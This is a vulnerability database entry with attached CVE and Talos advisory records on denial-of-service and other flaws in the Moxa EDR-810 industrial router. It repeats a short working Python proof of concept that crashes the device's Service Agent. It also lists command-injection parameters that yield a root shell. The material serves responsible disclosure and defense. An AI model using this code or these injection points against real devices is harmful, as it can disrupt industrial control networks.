Moxa EDR-810 Service Agent Multiple Denial of Service Vulnerabilities(CVE-2017-14438 - CVE-2017-14439)
2018-04-16T00:00:00
ID SSV:97229 Type seebug Reporter My Seebug Modified 2018-04-16T00:00:00
Description
Summary
Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp and 4001/tcp to trigger this vulnerability.
The Moxa EDR Service Agent listens on port 4000 (tcp/udp) and 4001 (tcp). Moxa MXconfig, a Windows program, interacts with the EDR via the ServiceAgent. Sending large amounts of random data to these ports causes a crash.
CVE-2017-14438 - Crash on Port 4000
In order to crash port 4000 (both TCP & UDP) a large packet needs to be sent to tcp/4000. This causes a consistent crash.
Port 4001
In order to crash port 4001 a large packet needs to be sent to tcp/4001. The crash does not always occur on the first try so an attacker may need to run this attack multiple times in order to cause a crash.
Exploit Proof-of-Concept
This python script will crash the Service Agent
import socket
host = '192.168.127.254'
port = 4000
packet = "\x00" * 5000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(packet)
data = s.recv(1024)
s.close
Timeline
2017-11-30 - Vendor Disclosure
2017-12-04 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release
import socket
host = '192.168.127.254'
port = 4000
packet = "\x00" * 5000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(packet)
data = s.recv(1024)
s.close
{"id": "SSV:97229", "type": "seebug", "bulletinFamily": "exploit", "title": "Moxa EDR-810 Service Agent Multiple Denial of Service Vulnerabilities(CVE-2017-14438 - CVE-2017-14439)", "description": "### Summary\r\nExploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp and 4001/tcp to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nMoxa EDR-810 V4.1 build 17030317\r\n\r\n### Product URLs\r\nhttps://www.moxa.com/product/EDR-810.htm\r\n\r\n### CVSSv3 Score\r\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\r\n\r\n### CWE\r\nCWE-20 - Improper Input Validation\r\n\r\n### Details\r\nThe Moxa EDR Service Agent listens on port 4000 (tcp/udp) and 4001 (tcp). Moxa MXconfig, a Windows program, interacts with the EDR via the ServiceAgent. Sending large amounts of random data to these ports causes a crash.\r\n\r\n### CVE-2017-14438 - Crash on Port 4000\r\nIn order to crash port 4000 (both TCP & UDP) a large packet needs to be sent to tcp/4000. This causes a consistent crash.\r\n\r\n### Port 4001\r\nIn order to crash port 4001 a large packet needs to be sent to tcp/4001. The crash does not always occur on the first try so an attacker may need to run this attack multiple times in order to cause a crash.\r\n\r\n### Exploit Proof-of-Concept\r\nThis python script will crash the Service Agent\r\n```\r\nimport socket\r\nhost = '192.168.127.254'\r\nport = 4000\r\npacket = \"\\x00\" * 5000\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((host, port))\r\ns.send(packet)\r\ndata = s.recv(1024)\r\ns.close\r\n```\r\n\r\n### Timeline\r\n* 2017-11-30 - Vendor Disclosure\r\n* 2017-12-04 - Vendor Acknowledged\r\n* 2017-12-25 - Vendor provided timeline for fix (Feb 2018)\r\n* 2018-01-04 - Timeline pushed to mid-March per vendor\r\n* 2018-03-24 - Talos follow up with vendor for release timeline\r\n* 2018-03-26 - Timeline pushed to 4/13/18 per vendor\r\n* 2018-04-12 - Vendor patched & published new firmware on website\r\n* 2018-04-13 - Public Release", "published": "2018-04-16T00:00:00", "modified": "2018-04-16T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-97229", "reporter": "My Seebug", "references": [], "cvelist": ["CVE-2017-14438", "CVE-2017-14439"], "lastseen": "2018-06-26T22:19:28", "viewCount": 4, "enchantments": {"score": {"value": 3.6, "vector": "NONE", "modified": "2018-06-26T22:19:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-14438", "CVE-2017-14439"]}, {"type": "talos", "idList": ["TALOS-2017-0487"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A234F8456A3CCBBC3F469D5F49D64E29"]}], "modified": "2018-06-26T22:19:28", "rev": 2}, "vulnersScore": 3.6}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-97229", "sourceData": "\n import socket\r\nhost = '192.168.127.254'\r\nport = 4000\r\npacket = \"\\x00\" * 5000\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((host, port))\r\ns.send(packet)\r\ndata = s.recv(1024)\r\ns.close\n ", "status": "cve,poc,details"}
{"cve": [{"lastseen": "2020-10-03T13:07:35", "description": "Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp to trigger this vulnerability.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-05-14T20:29:00", "title": "CVE-2017-14438", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14438"], "modified": "2018-06-15T18:58:00", "cpe": ["cpe:/o:moxa:edr-810_firmware:4.1"], "id": "CVE-2017-14438", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14438", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:35", "description": "Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4001/tcp to trigger this vulnerability.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-05-14T20:29:00", "title": "CVE-2017-14439", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14439"], "modified": "2018-06-15T18:58:00", "cpe": ["cpe:/o:moxa:edr-810_firmware:4.1"], "id": "CVE-2017-14439", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14439", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*"]}], "talos": [{"lastseen": "2019-05-29T19:20:11", "bulletinFamily": "info", "cvelist": ["CVE-2017-14438", "CVE-2017-14439"], "description": "# Talos Vulnerability Report\n\n### TALOS-2017-0487\n\n## Moxa EDR-810 Service Agent Multiple Denial of Service Vulnerabilities\n\n##### April 13, 2018\n\n##### CVE Number\n\nCVE-2017-14438, CVE-2017-14439\n\n### Summary\n\nExploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp and 4001/tcp to trigger this vulnerability.\n\n### Tested Versions\n\nMoxa EDR-810 V4.1 build 17030317\n\n### Product URLs\n\n<https://www.moxa.com/product/EDR-810.htm>\n\n### CVSSv3 Score\n\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n### CWE\n\nCWE-20 - Improper Input Validation\n\n### Details\n\nThe Moxa EDR Service Agent listens on port 4000 (tcp/udp) and 4001 (tcp). Moxa MXconfig, a Windows program, interacts with the EDR via the ServiceAgent. Sending large amounts of random data to these ports causes a crash.\n\n#### CVE-2017-14438 - Crash on Port 4000\n\nIn order to crash port 4000 (both TCP & UDP) a large packet needs to be sent to tcp/4000. This causes a consistent crash.\n\n#### Port 4001\n\nIn order to crash port 4001 a large packet needs to be sent to tcp/4001. The crash does not always occur on the first try so an attacker may need to run this attack multiple times in order to cause a crash.\n\n### Exploit Proof-of-Concept\n\nThis python script will crash the Service Agent\n \n \n import socket\n host = '192.168.127.254'\n port = 4000\n packet = \"\\x00\" * 5000\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n s.send(packet)\n data = s.recv(1024)\n s.close\n \n\n### Timeline\n\n2017-11-30 - Vendor Disclosure \n2017-12-04 - Vendor Acknowledged \n2017-12-25 - Vendor provided timeline for fix (Feb 2018) \n2018-01-04 - Timeline pushed to mid-March per vendor \n2018-03-24 - Talos follow up with vendor for release timeline \n2018-03-26 - Timeline pushed to 4/13/18 per vendor \n2018-04-12 - Vendor patched & published new firmware on website \n2018-04-13 - Public Release\n\n##### Credit\n\nDiscovered by Patrick DeSantis and Carlos Pacho of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2017-0378\n\nPrevious Report\n\nTALOS-2017-0482\n", "edition": 7, "modified": "2018-04-13T00:00:00", "published": "2018-04-13T00:00:00", "id": "TALOS-2017-0487", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0487", "title": "Moxa EDR-810 Service Agent Multiple Denial of Service Vulnerabilities", "type": "talos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "talosblog": [{"lastseen": "2018-05-06T18:56:20", "bulletinFamily": "blog", "cvelist": ["CVE-2017-12120", "CVE-2017-12121", "CVE-2017-12123", "CVE-2017-12124", "CVE-2017-12125", "CVE-2017-12126", "CVE-2017-12127", "CVE-2017-12128", "CVE-2017-12129", "CVE-2017-14432", "CVE-2017-14435", "CVE-2017-14438"], "description": "_These vulnerabilities were discovered by Carlos Pacho of Cisco Talos_ \n \nToday, Talos is disclosing several vulnerabilities that have been identified in Moxa EDR-810 industrial secure router. \n \nMoxa EDR-810 is an industrial secure router with firewall/NAT/VPN and managed Layer 2 switch functions. It is designed for Ethernet-based security applications in remote control or monitoring networks. Moxa EDR-810 provides an electronic security perimeter for the protection of critical assets such as pumping/ treatment systems in water stations, DCS systems in oil and gas applications, and PLC/SCADA systems in factory automation. \n \nMoxa has released an [updated version](<https://www.moxa.com/support/download.aspx?type=support&id=15851>) of the firmware. Users are advised to download and install the latest release as soon as possible to fix this issue. \n \n \n\n\n## Vulnerability Details\n\n### TALOS-2017-0472 (CVE-2017-12120) Moxa EDR-810 Web Server ping Command Injection Vulnerability\n\n \n[TALOS-2017-0472](<http://www.talosintelligence.com/reports/TALOS-2017-0472>) is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST can cause a privilege escalation resulting in attacker having access to a root shell. An attacker may be able to inject OS commands into the ifs= parm in the \"/goform/net_WebPingGetValue\" uri to trigger this vulnerability and take control over the targeted device. \n \n\n\n### TALOS-2017-0473 (CVE-2017-12121) Moxa EDR-810 Web RSA Key Generation Command Injection Vulnerability\n\n \n[TALOS-2017-0473](<http://www.talosintelligence.com/reports/TALOS-2017-0473>) is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST can cause a privilege escalation resulting in attacker having access to a root shell. An attacker can inject OS commands into the rsakey\\\\_name= parm in the \"/goform/WebRSAKEYGen\" uri to trigger this vulnerability and take control over the targeted device. \n \n\n\n### TALOS-2017-0474 (CVE-2017-14435 to 14437) Moxa EDR-810 Web Server strcmp Multiple Denial of Service Vulnerabilities\n\n \n[TALOS-2017-0474](<http://www.talosintelligence.com/reports/TALOS-2017-0474>) describes three separate exploitable denial of service vulnerabilities that exist in the web server functionality of Moxa EDR-810. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to \"/MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.ini\" without a cookie header to trigger this vulnerability. \n \n\n\n### TALOS-2017-0475 (CVE-2017-12123) Moxa EDR-810 Cleartext Transmission of Password Vulnerability\n\n \n[TALOS-2017-0475](<http://www.talosintelligence.com/reports/TALOS-2017-0475>) is an exploitable clear text transmission of password vulnerability that exists in the web server and telnet functionality of Moxa EDR-810. An attacker may be able to inspect network traffic to retrieve the administrative password for the device. The attacker may then use the credentials to login into the device web management console as the device administrator. \n \n\n\n### TALOS-2017-0476 (CVE-2017-12124) Moxa EDR-810 Web Server URI Denial of Service Vulnerability\n\n \n[TALOS-2017-0476](<http://www.talosintelligence.com/reports/TALOS-2017-0476>) is an exploitable denial of service vulnerability that exists in the web server functionality of Moxa EDR-810. Access to a specially crafted HTTP URI can cause a null pointer dereference resulting in the web server crashing. An attacker can send a crafted URI to trigger this vulnerability. \n \n\n\n### TALOS-2017-0477 (CVE-2017-12125) Moxa EDR-810 Web Server Certificate Signing Request Command Injection Vulnerability\n\n \n[TALOS-2017-0477](<http://www.talosintelligence.com/reports/TALOS-2017-0477>) is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST request can cause a privilege escalation resulting in access to root shell. An attacker may be able to inject OS commands into the CN= parm in the \"/goform/net_WebCSRGen\" uri to trigger this vulnerability. \n \n\n\n### TALOS-2017-0478 (CVE-2017-12126) Moxa EDR-810 Web Server Cross-Site Request Forgery Vulnerability\n\n \n[TALOS-2017-0478](<http://www.talosintelligence.com/reports/TALOS-2017-0478>) is an exploitable cross-site request forgery (CSRF) vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP request can trigger a CSFR vulnerability which may allow the attacker to change the device configuration. An attacker can create a malicious html code to trigger this vulnerability and entice the user to execute the malicious code. \n \n\n\n### TALOS-2017-0479 (CVE-2017-12127) Moxa EDR-810 Plaintext Password Storage Vulnerability\n\n \n[TALOS-2017-0479](<http://www.talosintelligence.com/reports/TALOS-2017-0479>) is a password storage vulnerability that exists in the operating system functionality of Moxa EDR-810. The device stores credentials in plaintext in /magicP/cfg4.0/cfg_file/USER_ACCOUNT.CFG. This file mirrors the contents of /etc/shadow, except that all the passwords are stored in plaintext. \n \n\n\n### TALOS-2017-0480 (CVE-2017-12128) Moxa EDR-810 Server Agent Information Disclosure Vulnerability\n\n \n[TALOS-2017-0480](<http://www.talosintelligence.com/reports/TALOS-2017-0480>) is an exploitable information disclosure vulnerability that exists in the Server Agent functionality of Moxa EDR-810. A specially crafted TCP packet can cause the device to leak data and result in an information disclosure. An attacker may be able to send a specially crafted TCP packet to trigger this vulnerability. \n \n\n\n### TALOS-2017-0481 (CVE-2017-12129) Moxa EDR-810 Web Server Weak Cryptography for Passwords Vulnerability\n\n \n[TALOS-2017-0481](<http://www.talosintelligence.com/reports/TALOS-2017-0481>) is an exploitable Weak Cryptography for Passwords vulnerability that exists in the web server functionality of Moxa EDR-810. After the initial login, each authenticated request sends a HTTP packet with a MD5 hash of the password. This hash is not salted and can be cracked, revealing the device's password. \n \n\n\n### TALOS-2017-0482 (CVE-2017-14432 to 14434) Moxa EDR-810 Web Server OpenVPN Config Multiple Command Injection Vulnerabilities\n\n \n[TALOS-2017-0482](<http://www.talosintelligence.com/reports/TALOS-2017-0482>) describes multiple exploitable command injection vulnerabilities that exist in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST request may cause a privilege escalation resulting in an attacker having access to a root shell. An attacker may be able to inject OS commands into various parameters in the \"/goform/net_Web_get_value\" uri to trigger this vulnerability. \n \n\n\n### TALOS-2017-0487 (CVE-2017-14438 and 14439) Moxa EDR-810 Service Agent Multiple Denial of Service\n\n \n[TALOS-2017-0487](<http://www.talosintelligence.com/reports/TALOS-2017-0487>) describes two exploitable denial of service vulnerabilities that exist in the Service Agent functionality of Moxa EDR-810. A specially crafted packet can cause a denial of service. An attacker may be able to send a large packet to tcp ports 4000 or 4001 to trigger this vulnerability. \n \nFor the full technical details of these vulnerabilities, please refer to the vulnerability advisories that are posted on our website: \n \n[http://www.talosintelligence.com/vulnerability-reports/](<https://www.google.com/url?q=http://www.talosintelligence.com/vulnerability-reports/&sa=D&ust=1523558764918000>) \n \n\n\n### Affected versions\n\n \nThe discovered vulnerabilities have been confirmed in Moxa EDR-810 V4.1 build 17030317 but they may also affect earlier versions of the product. \n \n\n\n## Discussion\n\n \nIndustrial control systems (ICS), including supervisory control and data acquisition (SCADA) systems, are used in industries such as energy providers, manufacturing and critical infrastructure providers in order to control and monitor various aspects of various industrial processes. ICS systems employ many mechanisms and protocols also used in traditional IT systems and networks. \n \nAlthough some characteristics of traditional IT systems and ICS are similar, ICS also have characteristics that differ in their service level and performance requirements. Many of these differences come from the fact that ICS has a direct effect on the physical world which may also include a risk to the health and safety of the population and a potential to cause damage to the environment. For that reason ICS have unique reliability requirements and may use real-time operating systems and applications that would not be used in everyday IT environments. \n \nOne of the pillars of ICS security, as well as the security of traditional IT networks, is restricting access to network activity. This may include unidirectional gateways, a demilitarized zone (DMZ) network architecture with firewalls and separate authentication mechanisms and credentials for users of corporate and ICS networks. \n \nICS devices, including firewalls that secure networks, run software which can contain vulnerabilities and serve as a pathway that may allow attackers to take advantage and intrude into an ICS network environment. \n \nCisco Talos vulnerability research team also focuses on non traditional computing environments, including ICS, to find previously unknown vulnerabilities and work with vendors to responsibly disclose them while allowing the vendor enough time to improve security of the products by fixing the discovered vulnerabilities. \n \nMoxa EDR-810 is one of the devices specialized in providing firewalls specifically designed to function within ICS infrastructure and provide network security to ICS processes. Cisco Talos researchers have discovered several vulnerabilities affecting the security of the product. Moxa EDR-810 users are recommended to update the software as soon as possible to avoid their ICS environment potentially being exploited by attackers. \n \n\n\n## Coverage\n\n \nThe following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org. \n \nSnort Rules: \n \n\n\n * 31939, 40880, 44835-44837, 44840-44842, 44847-44852, 44855, 44858\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=dNMKguKXjWw:nGXvtU2AjLo:yIl2AUoC8zA>)\n\n", "modified": "2018-04-13T16:03:59", "published": "2018-04-13T08:57:00", "id": "TALOSBLOG:A234F8456A3CCBBC3F469D5F49D64E29", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/dNMKguKXjWw/vuln-moxa-edr-810.html", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Vulnerabilities in Moxa EDR-810 Industrial Secure Router", "cvss": {"score": 0.0, "vector": "NONE"}}]}
